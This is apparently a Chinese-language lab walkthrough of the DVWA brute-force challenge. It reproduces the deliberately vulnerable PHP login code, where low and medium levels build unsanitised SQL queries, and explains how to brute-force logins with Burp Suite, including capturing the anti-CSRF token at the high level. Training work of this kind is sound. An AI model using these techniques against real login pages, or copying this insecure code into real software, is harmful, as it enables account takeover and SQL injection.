难度等级:LOW
具体题目:弱口令爆破,这是非常简单的一关,使用BP或者其他弱口令检测软件,进行弱口令爆破
解题技巧1:打开BP,设置proxy代理,随便输入账号密码,点击登录,这时,bp就可以抓到浏览器发出的数据包
解题技巧2:
将数据包发送至攻击模块,清除其他标记,仅标记username和password的字段值,选择密码字典进行攻击
解题技巧3:加入自己的破解词典进行破解
结果:成功爆破出来了两个账户,去测试一下试试。
# Brute Force --- Low源码
<?php
//检查提交的参数login是否存在值
if( isset( $_GET[ 'Login' ] ) ) {
// Get username 获取用户名
$user = $_GET[ 'username' ];
// Get password 获取密码
$pass = $_GET[ 'password' ];
$pass = md5( $pass ); // 将密码进行加密
// Check the database 在数据库中查询值
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful 登录成功将输出以下字符
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Medium等级
提醒:一样使用上面的方法,进行抓包攻击,最后也可以获得密码
提醒2:这一关的限制主要就是账户和密码分开进行查询,并不能阻挡爆破工具的攻击
# Brute Force --- Medium源码
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( 2 );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
难度等级:HIGH
提醒3:看一下高级代码
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); //检查请求中的token字段
// Sanitise username input
$user = $_GET[ 'username' ];
$user = stripslashes( $user ); //stripslashe()函数,返回剥离了反斜杠的字符串。
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); //检查用户名是否正确
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); //检查密码是否正确
$pass = md5( $pass ); //使用md5加密密码
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; //连接数据库查询用户,用户名和密码输入正确才能查询出结果,前面过滤了输入的参数,然后将过滤后的值插入查询语句,防止sql注入。
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( rand( 0, 3 ) );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken(); // 防止跨站攻击
?>
解题技巧4:抓包发送到Intruder模块中,将password字段和user_token字段都选择上,设置payload攻击模式为Pitchfork模式,这个模式的payload有两条,一条是password的,一条是user_token的,两个位置的payload是不冲突的,进行针对性的攻击。
解题技巧5:抓包发送到Intruder模块中,将password字段和user_token字段都选择上,设置payload攻击模式为Pitchfork模式,这个模式的payload有两条,一条是password的,一条是user_token的,两个位置的payload是不冲突的,进行针对性的攻击 。
提醒4: 设置payload,使用Grep-Extract中匹配出来的值进行攻击,设置完成后就可以进行攻击了。
以上为high等级的破解方法。